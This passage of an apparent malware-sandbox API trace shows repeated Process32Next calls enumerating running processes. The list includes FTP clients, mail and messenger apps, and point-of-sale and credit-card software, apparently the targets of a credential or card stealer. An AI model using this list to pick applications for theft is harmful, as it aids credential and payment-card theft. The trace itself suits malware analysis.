pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.644] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.646] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.647] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.648] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.650] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.652] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.689] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.692] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.694] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.697] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.786] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.788] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.790] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.791] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.796] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.798] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.800] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0254.801] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0254.803] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.804] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0254.806] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0254.808] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0254.813] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0254.815] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.816] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0254.818] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0254.820] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0254.821] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0254.823] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0254.841] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0254.843] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0254.845] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0254.846] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0254.848] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0254.849] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0254.850] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0254.852] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0254.854] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0254.855] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0254.859] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0254.861] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0254.863] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0254.864] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0254.866] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0254.867] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0254.869] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0254.871] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0254.875] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0254.877] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0254.878] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0254.879] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0254.881] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0254.882] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0254.884] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0254.885] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0254.950] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0254.952] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0254.954] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0254.956] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0254.958] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0254.960] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0254.962] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0254.963] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0254.968] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0254.970] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0254.971] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0254.973] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0254.975] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0254.976] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0254.978] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0254.980] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0254.984] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0254.986] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0254.987] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0254.989] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0254.991] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0254.992] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0254.994] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0254.995] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0255.050] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0255.052] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0255.054] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0255.055] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0255.057] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 